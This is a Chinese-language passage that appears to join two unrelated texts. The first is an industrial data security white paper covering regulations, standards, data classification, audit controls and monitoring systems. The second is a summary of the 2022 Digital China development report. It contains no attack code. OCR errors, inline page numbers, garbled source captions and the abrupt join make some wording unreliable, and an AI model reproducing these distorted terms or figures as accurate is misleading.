础设施相关技术)纳入欧盟工业战略的新技术范畴、为全欧洲提供适当的处理 数据的安全工具以及符合环境安全性与数据保护需要的数据处理和计算能力。 (二)立法明确工业数据安全保护要求 2021年6月10日,我国全国人民代表大会常务委员会于发布《中华人民共和国数 据安全法》,明确了工业主管部门的数据安全监管职责,对工业领域建立工业数 据分类分级制度、规范工业数据跨境传输活动等工作提出了要求,为确保工业数 07 08 据安全、保障制造业转型升级提供了法律依据。2022年2月10日,工业和信息 化部发布《工业和信息化领域数据安全管理办法(试行)》(征求意见稿), 对“工业数据”进行明确定义,对《数据安全法》中的相关制度和工作要求进行 细化,要求工业数据处理者应对工业数据处理活动负主体责任,针对不同级别数 据,规定了工业数据处理者在工业数据收集、存储、加工、传输、提供、公开、 销毁、跨境、承接、委托处理等各环节的安全保护要求。2022年2月17日,工业 和信息化部发布《关于组织开展工业领域数据安全管理试点工作的通知》,探索 构建工业数据安全管理体系,推进工业数据安全保护工作。 2022年2月23日,作为落实《欧洲数据战略》的举措之一,欧盟委员会发布《数 据法案》(草案),旨在为非个人数据,特别是智能设备、自动化生产线、自动 驾驶汽车等载体产生的工业数据,建立欧盟单一数据市场,促进欧洲数据价值释 放,预计到2028年将创造2700亿欧元价值。草案明确要求数据处理服务商在超越 欧盟范围或跨境处理上述数据时,采取一切合理的技术、法律等措施,评估数据 传输的合法性并确保数据传输满足允许的最低数据量,以确保数据传输安全。同 时,数据处理服务商应采取一切合理的安全措施,包括但不限于制定安全认证计 划、进行数据加密、多次频繁审计、实施安全验证等,以防止对非个人数据的非 法访问,确保非个人数据安全。 2021年10月12日,韩国发布《数据产业振兴和利用促进基本法》,强调保护数据 资产安全,加快发展数据产业,着力振兴数据经济。该法是全球首部规制数据产 业的基本法,明确了对数据开发利用的统筹安排。根据该法,韩国在总理办公室 下设国家数据政策委员会,作为国家数据产业政策的管理机构,作为国家数据产 业政策的跨部门决策与管理机构,负责每三年审议并发布数据产业振兴综合计 划。该法第12条“数据资产保护”中明确规定“保护由大量人力、物力投资和创 造的具有经济价值的数据(即数据资产),禁止未经授权获取、使用、披露数据 资产的行为”,为包括工业数据在内的、具有高经济价值数据的安全保护提供了 法律依据。此外,按照该法规定,韩国政府将培养数据经纪商作为数据经济的促 进者,并构建数据价值评估、资产保护和争端解决机制。 (三)制定标准规范工业数据防护管理 在国家标准方面,全国信安标委(TC260) 已发布的《数据交易服务安全要求》 (GB/T 37932-2019)《数据安全能力成熟度模型》 (GB/T 37988-2019)两 项 数据安全标准,均适用于工业数据安全保护。前者针对利用大数据交易服务机构 进行数据交易的服务活动,提出了确保数据交易对象安全、数据交易活动安全、 09 10 数据交易平台安全的相关要求。后者针对拥有或涉及数据的组织机构,围绕数据 全生命周期,提出了一些列安全控制措施。聚焦到工业领域行业标准,目前已初 步形成《工业领域重要数据和核心数据识别规则(草案)》《工业企业数据安全 防护要求(草案)》两项标准草案,前者给出了工业领域重要数据和核心数据的 定义、识别原则和识别方法。后者给出了工业企业数据安全防护的管理要求和全 生命周期保护要求,重点针对不同安全级别的工业数据提出分级防护要求,建议 企业要保持数据分类分级的持续性,并强化数据的全生命周期的安全保障。 2020年9月,美国国家标准和技术研究院 (NIST) 发布《数据完整性恢复指南》 (SP 1800-11),围绕安全存储、损坏测试、备份恢复、虚拟架构、日志记录五 个方面,指导重点行业企业制数据安全策略,帮助企业从勒素攻击、内部攻击、 操作错误中恢复数据完整性,实现关键数据的安全保护。该指南适用于对工业数 据的保护,强调对数据破坏事件的预防、检测和告警,指出了恢复数据库、用户 文件、应用程序和系统配置的策略方法,特别提出要通过用户活动监测、文件系 统监测、数据库监测以及数据快速恢复解决方案等技术工具,为确保数据完整性提 供支持。美国工业互联网联盟也日益关注工业领域数据安全,2019年7月发布《 工业互联网数据保护最佳实践白皮书》,结合工业互联网安全框架、IEC62443, IEC61508 等工控安全标准,提出工业互联网数据在安全性、完整性和隐私性方面 的安全保护措施。我国网络安全界、工业界正在积极探素工业数据保护实践。 工业数据安全管理策略与监测应急技术 随着大数据技术和产业的发展壮大,数据作为新型生产要素被广泛的应用于生 产生活,数据的价值得到了持续的开发和利用,其安全的重要性不言而喻,数 据安全建设已经成为企业风险管理工作的重中之重。数据安全涉及数据识别、 加密、脱敏、标记、防泄漏、容灾备份等众多细分技术领域,如何融合这些技 术井形成集约化的管理措施,构建统一、标准化的数据梳理与分类分级系统, 保障数据全生命周期的安全,完成对数据资产及风险的实时监控至关重要。 本部分主要从工业数据安全分类管理、数据安全的监测以及数据安全应急三个 维度出发,构建工业数据安全完整的治理策略。 (一)开展工业数据分类分级,明确工业数 据保护对象及检测应急方向 工业领域涉及的行业众多、应用场景丰富、业务环节复杂,相应的数据种类、形态 也十分多样,特别是大量工业系统设备都在实时产生或收集数据,数据规模呈指数 级增长。 11 12 资料来测:工倍部、FreeBuf咨离、公开资料整理 13 14 在工业数据的存储过程中,企业需针对不同类别与级别的数据建立相应的授权机制, 采取对应的物理或逻辑隔离措施,同时利用数据脱敏技术确保敏感信息被漂白的同时 不影响技术开发、测试人员对于数据的使用。当前我国的数据脱敏技术已在近年来的 不断发展中逐步走向成熟,平衡数据的可用性与隐私性是数据脱敏处理的关键。 整体而言,企事业单位及相关部门在未来仍需进一步精细化工业数据的分类分级标 准。与此同时,工业数据的属性会随着业务、行业、合规环境的变化而不断变化。数 据处理者应当不断调整数据的分类分级以构建动态的防护策略,并针对数据库的不同 用户进行权限梳理,持续监控用户的启用状态、权限划分、角色归属等基本信息,确 保工业数据管理的时效性与有效性。 为保护审计数据的安全,通常的安全技术措施如下: ■系统用户分权管理:操作系统、数据库等系统设置操作员、安全员和审计员三种 类型的用户 ■操作员:只负责对系统的操作维护工作,其操作过程被系统进行了详细记录 ■安全员:负责系统安全策略配置和维护 ■审计员:负责维护审计相关事宜,可以查看操作员、安全员工作过程日志;操作员 不能够修改自己的操作记录,审计员也不能对系统进行操作 ▶ 审计数据强制访问:系统采取强制访问控制措施,对审计数据设置安全标记,防 止非授权用户查询及修改审计数据 ,审计数据加密:使用加密技术对敏感的审计数据进行加密处理,以防止非授权查 看审计数据或泄露 审计数据隐私保护:采取隐私保护技术,防止审计数据泄露隐私信息 ,审计数据完整性保护:使用Hash算法和数字签名,对审计数据进行数字签名和来 源认证、完整性保护,防止非授权修改审计数据 (二)确立工业数据安全建设目标,构建工 业数据库综合监测应急平台 工业控制系统安全涉及国家关键基础设施和经济社会稳定大局,辐射范围广泛,其 威慑力和影响力不亚于传统战争,已成为国家间对抗的全新手段。攻击者已经将工 业控制系统作为其首选攻击目标。 在工业信息系统密集且技术高度集中的情况下,实现对敏感数据的自动发现、对数 据库的全面审计与安全评估、对数据库的访问行为进行全方位状态监控、对威胁数 据的追踪溯源成为工业数据安全管控的核心建设目标。若要实现这一目标,企业可 首先从实现数据库的可视化监控着手,进而构建一套动态工业数据安全综合管控策 略,持续优化工业数据运转全生命周期的安全性。 15 16 ·工业数据安全管控建设目标 数科末源:Freelu/省询,公开资料整排 实现数据库可视化策略首先应当解析工业数据库系统在传输时使用的专用通讯协议及 私有协议,实现对应用系统、超级权限人员在对业务数据操作访问时的监控与审计, 并对内部控制应用系统与外部应用系统共享交换数据的过程进行实时监控与审计,以 ■协议解析:利用DFI、DPI流量识别技术,在不依赖协议描述的情况下,分析工业 信息数据库API等接口的协议规律,识别协议语法、语义等信息并提取系统行为和 指令执行内容。协议解析技术可将通过审计调用的各接口信息,研究并监控数据 库各项活动指标。 ■审计与监控:对数据库操作行为进行审计,并依照监控记录分析出工业信息数据 库遭受的攻击、误操作、违规操作行为井进行告警。 随着数据处理逐步渗透到工业生产的各个环节,外部攻击的规模、手段与目标也不断 演化。工业数据库需要对存储设备自身的性能安全进行持续全面的监控与安全评估, 在使用数据的过程中进行敏感数据的保护,数据的溯源追踪,并最终形成未来的安全 态势研判,实现工业信息数据库的综合管控。 基于对工业信息数据库安全技术的全面分析,企业仍需进一步深入发展研究工控数据 库安全漏洞及弱点扫描技术、攻防技术、A 技术、综合治理及态势感知技术等,构建 工业信息数据库安全治理平台,并最终实现对工业信息数据库系统的事前风险预防、 事中主动防御、事后及时取证的综合防御效果。 达到对工业信息数据库的可视化。 数据处理者需站在全局视角,对所有数据库的操作行为进行审计并进行相应的可视化 的展示;对审计分析到的风险行为进行及时阻断与告警;提供可视化监控报表以及审 计系统操作日志记录等。 17 18 (三)围绕工业数据全生命周期,制定有效 安全防护策略 工业领域数据涉及主体多、种类多、格式多,既有工业企业产生和收集的研发设计、生 产制造、运行维护等数据,也有工业互联网平台企业产生和收集的平台运营数据、知识 库模型库数据,还有工控厂商产生和收集的设备生产运维数据、产品测试数据等。 在工业数字化转型的不断推进过程中,工业数据也从过去以数据库为载体的单一场景向 云、大、物、移等其他场景不断延伸,数据安全风险贯穿数据处理的多个阶段。数据防 护、评估的生态逐步由原先单品类防护走向数据采集、传输、存储、处理、交换到销毁 全生命周期的建设,工业数据在其生命周期的各个阶段也具有不同的防护侧重点。 ■工业数据在采集阶段应着重辨别数据的真伪,确保采集到的信息没有被篡改、伪 造,且不存在破坏数据完整性的恶意代码。与此同时,数据提供者应动态监控采 集者的数据访问权限,以防数据被超范围采集。 ■工业数据在存储阶段应防范诸如缓冲区溢出、SQL 注入等数据库漏洞,防止木 马、数据库勒索、数据库后门等攻击,同时建立明确的数据访问控制系统,以保 障数据不被窃取、泄露或超范围使用。此外,维护数据的完整性,避免重要数据 的丢失也是工业数据存储的一大关键点。 ■ 在工业数据传输、交换与共享的过程中,明确数据类型、风险级别、应用场景以及 可共享范围,进而评估数据公开对于公共利益以及国家安全产生的影响是核心。 ●部分数据需根据法律或合同约定进行销毁,企业应确立销毁对象及机制,并对工 数据加密以及访问控制技术是贯穿数据全生命周期安全的核心技术,传统基于 物理边界、静态加密的数据访问控制措施,正开始向基于身份、更具颗粒度的 动态访问策略调整,涉及多因素融合认证枢纽、信用基线管理、持续风险及信 任积分评估模型、访问控制策略动态调整引擎等新兴、智能技术手段。 现阶段我国对于相关技术的研发尚处于探素阶段,加之数据存储环境将在未来 不断趋于多样化,建设适配云端等环境的加密策略至关重要,实现工业数据访 问的动态管理也将会是我国工业企业长期、持续性的战略目标。 (四)监测工业数据安全态势,排查工业数 据安全隐患 从管理层面来看,数据安全评估可分为监管驱动类评估和行业自律类评估。其中, 监管驱动类评估主要有数据安全风险评估、出境评估、合规评估等,这一类评估工 作往往会由主管部门组织制定评估制度和标准规范,明确评估要点。行业自律类评 估主要有数据安全治理能力评估、数据安全能力成熟度评估等,这一类评估工作主 要是依据联盟团体或标委会等制定的标准规范,引导相关单位自愿开展的活动。 不管是监管驱动还是行业自律,开展数据安全评估工作对于提前摸排发现风险、及 时消除隐患、提升安全保护水平等都具有重要意义,应将数据安全评估作为日常工 作抓好抓实。 业数据销毁行为进行记录, 19 20 实时监控数据风险、排查数据安全隐患可帮助企业对数据完成全时态防护。企 事业单位与地方工业和信息化部门应分别从企业侧与监管侧建设数据安全监测 系统,形成部、省、企业三级联动的工业数据安全监测体系。评估流程可从多 个环节开展,包括但不限于监测与业务有关的数据风险,日志审计、多租户管 理等数据合规风险,以及数据安全组件功能、数据接口安全等技术相关的数据 风险。 企业、地方相关部门与工业和信息化部各自的职责如下:企业应及时将监测结 果、数据安全风险信息以及涉及重要、核心数据的安全事件上报至地方机构, 同时在完成数据处置后按时形成总结报告,每年汇集数据安全处置结果通报至 地方部门。地方机构通过汇总、统筹地方性工业数据安全信息并发布预警信 息,完成安全事件应急处置工作,并将可能造成严重危害的数据安全风险、事 件与事件处置情况上报至工业和信息化部。工业和信息化部负责建立数据安全 监测、预警、风险上报与共享机制的建立与应急预案的制订,完成核心/重要数 据的应急处置工作。 工业数据安全监测系统采用分布式架构,由探针与监测系统构成。探针负责工 业数据及访问流量的采集与分级分类,监测数据流转情况,通过动态梳理、分 析采集到的数据形成安全事件。监测系统承担统筹分析的职责,制订数据分级 分类与风险及脆弱性识别策略,建立攻击风险与特征库,从多个维度对数据进 行关联分析进而产出风险判断与违规告警。除此之外,成熟的数据监测系统还 将进一步分析安全事件影响,预测风险趋势。 数据监测系统将数据识别、分类分级以及数据流转等策略下发至探针,探针则 将数据流转信息、风险与脆弱性详情以及安全事件上报至数据监测系统,形成 动态循环的闭环链路,构建数据安全综合审计系统,达到事前安全威胁预警、 事中安全事件告警与处置与事后风险源头自动追踪溯源的目的,完成对数据安 全态势的全面监控。 工业数据监测系统在未来可从数据流转基线与分布监测、数据识别及风险特征 策略库,安全事件审核机制,风险溯源及成因分析等多个维度出发,进一步融 入大数据、人工智能等手段提升数据监测与治理质量与自动化水平。 21 22 工业数据安全监测+应急系统一览 资料来源:FreeBuf备有 工业数据安全产业发展现状与未来 当前我国正处在工业数字化转型的关键时期,企业的生产、运转与交付模式均 产生了全面的革新。工业数据结构趋于庞杂、工业数据规模呈爆发式增长,也 将工业数据的安全管理难度推向了新的高度,如何打通海量多源数据,形成一 套集约化的工业数据安全治理手段,是企事业单位及相关部门在未来支撑工业 数字化转型不断推进的关键。与此同时,5G、云等新一代信息技术正在以不可 逆转的速度持续赋能工业互联网,搭建云边端多场景的部署模型也将成为未来 工业数据安全保护的核心发力点。 (一)数据合规基础平台建立起点,破局工 业“数据黑箱” 一是工厂各业务部门数据庞大,缺乏整合与有效利用。制造业生产、管理、质 检、销售等部门,往往局限于大大小小的“孤岛”之中,这些数据没有有效进 23 24 行分享以及关联,导致各部门信息缺乏联动,无法完全互通,数据真正的价值 常常难以被释放。 二是制造业数据普遍缺乏分析与可视化处理能力。目前多数制造型企业仍主要 以传功的电子看板与报表来了解企业的生产经营情况。这种数据输出方式存在 很大的弊端。首先,数据无法实时传达各个部门,数据统计工作量大;其次, 数据准确性低,会影响与各部门的合作结果;更重要的是,制造生产的过程、 质量、成本管理均需通过手工的形式来完成,很难与生产系统、管理系统的最 新数据进行同步,也无法生成实时性数据洞察。 三是传统手工数据的工作方式对员工效率与精准度、专业度要求极高。报表的 制作对员工的专业技能提出了极高的要求,即便是高度专业的工作人员,面对 庞大的数据系统,也难免产生误差。人工数据存在准备周期长,且很难实时满 足不断变化的数据要求,这会导致员工工作压力大、效率低的问题。 四是数据利用程度低,无法释放数据潜力。据统计,制造业的生产数据只有不 到5%能得到有效的利用。造成制造业低利用率的主要原因在于大多数企业仍缺 乏体系化的数据管理思维,在数据管理方面人员和分析师的投入也较少,不能 有效建立数据管理与关联交互分析。 五数据监测和应急重视度低,导致整个数据安全溯源管控能力大幅降低。 针对工业数据面临的如上挑战,搭建体系化的工业大数据分析平台,可帮助企 业从设备运维、生产质量、与生产流程三个维度建立动态管理策略。 ■ 设备运维解决方案 工业大数据针对工业领域的机器学习,整体提升故障预测及设备健康管理的准 确性,使企业的所有设备健康运行,从而提高生产效率。具体解决的应用问题 如下: ·工业大数据设备运维解决方案 黄科床源:FaeBuf 容询,公开衡料整路 25 26 ■ 工业大数据生产质量分析 工业大数据为整体生产质量提供关键性优化流程,通过追溯生产过程来优化生 产工艺,使质量形成更加全面和及时的闭环。从机器算法的角度,及时发现生 产过程中的异常趋势,预防批量质量不达标,减少浪费;对关键性质量问题进 行自动排查,通过关联分析、模式挖掘进行数据分析统计, 一方面可以提供企 业生产对策优化,还有助于经验的沉淀和精化。 ·工业大数据生产质量分析 资料来准:FreeBuf倍面。公开资料整理 ■ 工业大数据生产流程优化 工业大数据通过完整且实时的数据为客户的团队提供支持,消除不确定性并为 更明智、更安全的决策提供信息,从而减少生产过程的问题,优化生产流程、 提升产量。具体解决的应用问题: ·工业大数据生产流程优化方案 资构来源;FreeBuf答流。公开资料整强 27 28 (二)5G 与工业互联网融合持续深化,推动 工业数据确权与分类分级走向精细化 5G是驱动工业互联网蓬勃发展的关键技术之一,而工业互联网也是加快5G 商用规 模部署的重要突破口之一,二者相辅相成。到2035年,工业将占据5G 创造的全部 经济活动中的最大份额,实现约3.4万亿美元产出,占5G总产出的28%。 随着5G 与工业互联网的融合趋势不断深化,确保数据在“5G+ 工业互联网”的应用 场景下安全流转是基础。2021年11月在“5G+ 工业互联网代表大会”上,国务院副 总理刘鹤明确指出“要研究推进数据确权和分类分级管理,畅通数据交易流动”。 进一步精细化工业数据分类分级制度,同时建立细粒度的授权访问机制是“5G+ 工 业互联网”数据安全保护的核心。 一方面,5G 带来数据量级的增长,高频、密集的 数据流与更丰富的数据传输路径,海量数据需依托更具体的分类分级制度进行梳 理。另一方面,5G 网络接入了更广泛的终端设备,具有更多样化的数据共享场景以 及更复杂的数据归属域,切片式的管理系统也使得网络边界变得模糊,对数据的鉴 权机制提出了更高的要求,需数据处理者秉承最小访问原则,细化授权机制。 (三)工业云优化工业生产与经营流程,重 新定义工业数据安全保护范式 工业在数字化转型的进程中,存在非标设备以及多源异构数据多、封闭性强,数据 格式不统一的问题。将云计算融入工业互联网建设,搭建云边一体化方案,可帮助 汇聚各类数据,实现数据互联与大数据分析,进而优化工业生产与经营流程,完善 资源配置,打造多产业链协同,加速工业算法落地。 工业云是指服务于特定工业过程(例如组件制造)的云系统或服务。就配置或类型 而言,工业云服务可分为公有云与私有云的服务模式,也可以打包作为专有解决方 案或工业应用的开源解决方案。值得注意的是,工业云不是一种新型技术,也不是 范式转变的概念或解决方案,而只是使用云计算来处理工业流程和挑战的一种特定 方法或方式。因此,它提供了专门为工业或制造过程而设计的特定功能和解决方 案,例如EXOR 的X平台。 就工业云而言,其垂直性质意味着云解决方案可以存储设备数据并管理互连的设备 或与制造紧密相关的其他任务。工业云具有高度专业性,可在特定行业中发挥作用 且很少偏离其核心竞争力。 工业云还具有特定的工业功能,例如管理数据和计划任务的能力,可以通过特定算 法确定要发送到云的数据。在涉及调度的地方,工业云算法可以从车间获取库存数 据和其他信息,并使用收集的数据来创建可优化制造过程的生产调度。这通常被称 为数据驱动的工厂绩效优化方法。另一方面,商业云解决方案将难以处理这些特定 于制造的任务,使用商业云解决方案的企业将必须建立大规模的配置过程,以将这 些功能吸收到他们的云环境中。 总体而言,工业云在了解与特定行业相关的数据,标准和监管政策方面具有优势。 在进行扩展时,企业获得的不仅仅是计算资源的增加,工业云的可伸缩性发生在由 工业环境的标准和策略设置的约束内,这在提高性能的同时降低了计算成本。不仅 29 30 如此,工业云同时还可以更好地处理拥Industry 4.0概念所带来的变化,其内置功 能可以从智能边缘设备接收数据并集成OPC UA在TSN 上指定的通信协议。种种迹象 都表明,云计算将在未来进一步赋能工业大数据计算,助力数字工业蓬勃发展。 在我国工业上云稳步推进的大背景下,企业需具备适应云环境的安全防护能力,制 订工业云数据安全策略。具体而言,基于云的虚拟化部署形式重新定义了工业数据 的存储、共享、流转、应用与管理流程,分布式的计算与存储技术模糊了数据访问 边界,也增大了工业数据信息泄露、工业数据超范围获取等风险,松散的身份验 证、弱口令、不安全的密钥管理都可能导致访问权限出现异常。优化工业云数据加 密与共享机制,构建细粒度的访问授权,完善网络功能分区将在未来成为云上工业 数据保护的主要目标。与此同时,清晰的权责划分机制是推动“云+产业”结合的 基础。企业与云服务商应积极搭建责任共担模型,明确数据资产的所有权与安全责 任,保障工业上云顺利推进。
standards
摘 要 党的二十大报告指出,要加快建设网络强国、数字中国。 建设数字中国是数字时代推进中国式现代化的重要引擎,是构 筑国家竞争新优势的有力支撑。 中共中央、国务院印发《数字 中国建设整体布局规划》,按照夯实基础、赋能全局、强化能 力、优化环境的战略路径,明确了数字中国建设“2522” 的整体 框架,从党和国家事业发展全局的战略高度作出了全面部署。 2022 年,各地区、各部门、各领域积极探索实践,数字中国建 设进入整体布局、全面推进的新阶段。 一、2022 年数字中国建设取得显著成效 数字基础设施规模能级大幅提升。截至 2022 年底,累计建 成开通 5G 基站 231.2 万个,5G 用户达 5.61 亿户,全球占比均 超过 60%。全国 110 个城市达到千兆城市建设标准,千兆光网 具备覆盖超过 5 亿户家庭能力。 移动物联网终端用户数达到 18.45 亿户,成为全球主要经济体中首个实现“ 物超人” 的国家。 IPv6 规模部署应用深入推进,活跃用户数超 7 亿,移动网络 IPv6 流量占比近 50%。 我国数据中心机架总规模超过 650 万标准机 架,近 5 年年均增速超过 30%,在用数据中心算力总规模超 180EFLOPS,位居世界第二。工业互联网已覆盖工业大类的 85% 以上,标识解析体系全面建成,重点平台连接设备超过 8000 万 台(套)。车联网由单条道路测试拓展到区域示范, 已完成智 能化道路改造超过 5000 公里。 数据资源体系加快建设。 《关于构建数据基础制度更好发 挥数据要素作用的意见》 印发实施,系统提出我国数据基础制 度框架。数据资源规模快速增长,2022 年我国数据产量达8. 1ZB, 同比增长 22.7%,全球占比达 10.5%,位居世界第二。截至 2022 年底,我国数据存储量达 724.5EB,同比增长 21.1%,全球占比 达 14.4%。全国一体化政务数据共享枢纽发布各类数据资源 1.5 万类,累计支撑共享调用超过 5000 亿次。我国已有 208 个省级 和城市的地方政府上线政府数据开放平台。2022 年我国大数据 产业规模达 1.57 万亿元,同比增长 18%。北京、上海、广东、 浙江等地区推进数据管理机制创新,探索数据流通交易和开发 利用模式,促进数据要素价值释放。 数字经济成为稳增长促转型的重要引擎。2022 年我国数字 经济规模达 50.2 万亿元, 总量稳居世界第二, 同比名义增长 10.3%,占国内生产总值比重提升至 41.5%。数字产业规模稳步 增长, 电子信息制造业实现营业收入 15.4 万亿元, 同比增长 5.5%;软件业务收入达 10.81 万亿元,同比增长 11.2%;工业互 联网核心产业规模超 1.2 万亿元,同比增长 15.5%。数字技术和 实体经济融合深入推进。农业数字化加快向全产业链延伸,农 业生产信息化率超过 25%。全国工业企业关键工序数控化率、 数字化研发设计工具普及率分别增长至 58.6%和 77.0%。全国网 上零售额达 13.79 万亿元,其中实物商品网上零售额占社会消费 品零售总额的比重达 27.2%,创历史新高。数字企业创新发展 动能不断增强。我国市值排名前 100 的互联网企业总研发投入 达 3384 亿元, 同比增长 9.1%。科创板、创业板已上市战略性 新兴产业企业中,数字领域相关企业占比分别接近 40%和 35%。 数字政务协同服务效能大幅提升。 《关于加强数字政府建 设的指导意见》印发,推进政府数字化、智能化转型。从 2012 到 2022 年,我国电子政务发展指数国际排名从 78 位上升到 43 位,是上升最快的国家之一。 国家电子政务外网实现地市、县 级全覆盖, 乡镇覆盖率达 96.1%。全国一体化政务服务平台实 名注册用户超过 10 亿人,实现 1 万多项高频应用的标准化服务, 大批高频政务服务事项实现“ 一网通办”“跨省通办”,有效解决市 场主体和群众办事难、办事慢、办事繁等问题。全国人大代表 工作信息化平台正式开通,数字政协、智慧法院、数字检察等 广泛应用,为提升履职效能提供有力支撑。党的二十大报告起 草过程中, 中央有关部门专门开展了网络征求意见活动,收到 854.2 万多条留言。 数字文化提供文化繁荣发展新动能。 《关于推进实施国家 文化数字化战略的意见》 印发实施,推动打造线上线下融合互 动、立体覆盖的文化服务供给体系。文化场馆加快数字化转型, 智慧图书馆体系、公共文化云建设不断深化,全民阅读、艺术 普及数字化服务能力显著提升,我国数字阅读用户达到 5.3 亿。 网络文化创作活力进一步激发。“ 中国这十年”“ 沿着总书记的足 迹” 等网络重大主题宣传充分展示新时代伟大成就。全国重点网 络文学企业作品超过 3000 万部,网文出海吸引约 1.5 亿用户, 海外传播影响力不断增强。数字技术与媒体融合深入推进。 我 国第一个 8K 超高清电视频道 CCTV-8K 开播,为广大观众呈现 超高清奥运盛会。 数字社会建设推动优质服务资源共享。我国网民规模达到 10.67 亿,互联网普及率达到 75.6% ,城乡地区互联网普及率差 异同比缩小 2.5 个百分点。 国家教育数字化战略行动全面实施, 国家智慧教育公共服务平台正式开通,建成世界第一大教育教 学资源库。数字健康服务资源加速扩容下沉,地市级、县级远 程医疗服务实现全覆盖,全年共开展远程医疗服务超过 2670 万 人次。社保就业数字化服务持续拓展,全国电子社保卡领用人 数达 7. 15 亿,各类人社线上服务渠道持续完善,提供服务近 141 亿人次。数字乡村建设加快提升乡村振兴内生动力,推进城乡 共享数字化发展成果。适老化、无障碍改造行动加速推进,全 民数字素养与技能持续提升。 数字生态文明建设促进绿色低碳发展。 生态环境智慧治理 水平不断提升。自然资源管理和国土空间治理加快数字化转型, 基本建成国家、省、市、县四级统一的国土空间规划“ 一张图” 实施监督系统。 生态环境数据资源体系持续完善,新增或补充 了空气质量监测、排污口、危险废物处置等 33 类数据,数据总 量达到 169 亿条。全国已建成 26 个高精度和 90 个中精度大气 温室气体监测站点。数字孪生水利框架体系基本形成,启动实 施 94 项数字孪生流域先行先试任务。数字化绿色化协同转型取 得初步成效。截至 2022 年底,全国累计建成 153 家国家绿色数 据中心,规划在建的大型以上数据中心平均设计电能利用效率 (PUE)降至 1.3。5G 基站单站址能耗比 2019 年商用初期降低 20%以上。北京、 山西、 四川、安徽等地探索碳账户、碳积分 等形式,推进普及绿色生活理念。 数字技术创新能力持续提升。2022 年,我国信息领域相关 PCT 国际专利申请近 3.2 万件,全球占比达 37%,数字经济核 心产业发明专利授权量达 33.5 万件,同比增长 17.5%。关键数 字技术研发应用取得积极进展。我国 5G 实现了技术、产业、网 络、应用的全面领先,6G 加快研发布局。我国在集成电路、人 工智能、高性能计算、EDA 、数据库、操作系统等方面取得重 要进展。数字技术协同创新生态不断优化,各地积极推进数字 技术创新联合体建设,数字开源社区蓬勃发展,开源项目已覆 盖全栈技术领域。 数字安全保障体系不断完善。 网络安全法律法规和标准体 系逐步健全。 《网络安全审查办法》修订出台,推动发布《关 键信息基础设施安全保护要求》等 30 项网络安全国家标准。网 络安全防护能力大幅提升, 网络安全教育、技术、产业等加快 发展。全国超 500 所本科和高职院校开设网络与信息安全相关 专业,2022 年我国网络安全产业规模预计近 2170 亿元,同比增 长 13.9%。 圆满完成北京冬奥会、党的二十大等重大活动网络 安全保障。连续 9 年举办国家网络安全宣传周,深入开展常态 化的网络安全宣传教育。数据安全管理和个人信息保护有力推 进。 《数据出境安全评估办法》等发布实施,《个人信息出境 标准合同规定(征求意见稿)》公开征求意见,推动提升重要 数据和个人信息保护合规水平。 数字治理营造良好发展环境。我国网络法律体系基本形成, 网络立法的系统性、整体性、协同性、时效性不断增强。 《互 联网用户账号信息管理规定》《互联网信息服务深度合成管理 规定》等制定实施,推动互联网信息服务管理制度持续完善。 网络综合治理体系加快完善,深入开展“ 清朗” 系列专项行动, 清理违法和不良信息 5430 余万条,处置账号 680 余万个,网络 生态持续向好。数字领域标准建设稳步推进,我国在自动驾驶、 大数据、工业互联网、智慧城市等方面,牵头推动一批数字领 域国际标准立项发布。 数字领域国际合作凝聚广泛共识。 我国积极参与联合国、 世界贸易组织(WTO)、二十国集团(G20)、亚太经合组织 (APEC)、金砖国家(BRICS)、上海合作组织(SCO)等机 制下数字议题磋商研讨,推动达成《金砖国家数字经济伙伴关 系框架》《“ 中国+ 中亚五国” 数据安全合作倡议》等。2022 年世 界互联网大会国际组织正式成立,会员已覆盖 6 大洲 20 余个国 家,包括 100 余家机构、组织、企业及个人。发布《携手构建 网络空间命运共同体》 白皮书。数字贸易开放合作持续深化, 我国已与28 个国家签署电子商务合作备忘录并建立双边电子商 务合作机制。 二、2022 年数字中国发展成效评价 国家网信办组织开展 2022 年数字中国发展评价工作,围绕 数字中国建设“2522” 整体框架,结合相关部门和机构数据, 以 及数字中国发展情况网络问卷调查结果,重点评估 31 个省(自 治区、直辖市)在夯实基础、赋能全局、强化能力、优化环境 以及组织保障等方面的进展成效。综合评价结果显示,浙江、 北京、广东、江苏、上海、福建、 山东、天津、重庆、湖北等 地区数字化综合发展水平位居全国前 10 名,其他地区也在加快 数字化发展中取得积极成效。 同时,国家网信办持续开展数字中国发展情况网络问卷调 查。参与调查的网民普遍认为,2022 年,数字化学习工作广泛 普及,数字化转型加快推进,数字公共服务更加普惠便捷,数 字化公共治理成效进一步显现,数字中国建设的获得感、幸福 感和安全感持续提升。 三、2023 年数字中国发展形势与展望 当前, 以信息技术为代表的新一轮科技革命和产业变革突 飞猛进,为加快建设数字中国,推进中国式现代化提供了强大 发展动能。与此同时,世界之变、时代之变、历史之变正以前 所未有的方式展开,数字中国建设面临着愈发纷繁复杂的发展 形势。从外部看,关键核心技术之争加剧数字产业链动荡局势, 数字领域标准体系与国际规则竞争日趋激烈,新技术、新应用 持续涌现带来新变革与新影响。从内部看,数字技术创新潜能 有待深入挖掘,数字化发展的系统性、整体性、协同性亟需提 升,数字治理体系仍待深度优化,数字包容体系尚需健全完善。 2023 年是全面贯彻落实党的二十大精神的开局之年,也是 全面推进《数字中国建设整体布局规划》实施的起步之年。 我 们要坚持以习近平新时代中国特色社会主义思想特别是习近平 总书记关于网络强国的重要思想为指导,加快建设数字中国, 为全面建设社会主义现代化国家提供有力支撑。 一是夯实数字中国建设基础。打通数字基础设施大动脉, 持续拓展网络基础设施覆盖广度深度,推进算力基础设施优化 布局,加快提升应用基础设施水平。 畅通数据资源大循环,健 全国家数据管理体制机制,加快构建数据基础制度体系,推动 公共数据汇聚利用,释放商业数据价值潜能。 二是全面赋能经济社会发展。做强做优做大数字经济,培 育壮大数字经济核心产业,加快数字技术创新应用和传统产业 数字化转型。支持数字企业发展壮大,推动平台企业规范健康 发展。发展高效协同的数字政务,加快制度规则创新,完善与 数字政务建设相适应的规章制度。 强化数字化能力建设,促进 信息系统网络互联互通、数据按需共享、业务高效协同。提升 数字化服务水平,推进线上线下融合。打造自信繁荣的数字文 化,深入实施国家文化数字化战略。加强优质网络文化产品供 给,强化网络版权保护。提升数字文化服务能力,加快发展新 型文化企业、文化业态、文化消费模式。构建普惠便捷的数字 社会。促进数字公共服务普惠化,大力实施国家教育数字化战 略行动,规范互联网诊疗和互联网医院发展。推进数字社会治 理精准化,深入实施数字乡村发展行动。普及数字生活智能化, 深入实施全民数字素养与技能提升行动,推进全民畅享数字生 活。建设绿色智慧的数字生态文明。推动生态环境智慧治理, 推进智慧国土、智慧水利体系建设,加快数字化绿色化协同转 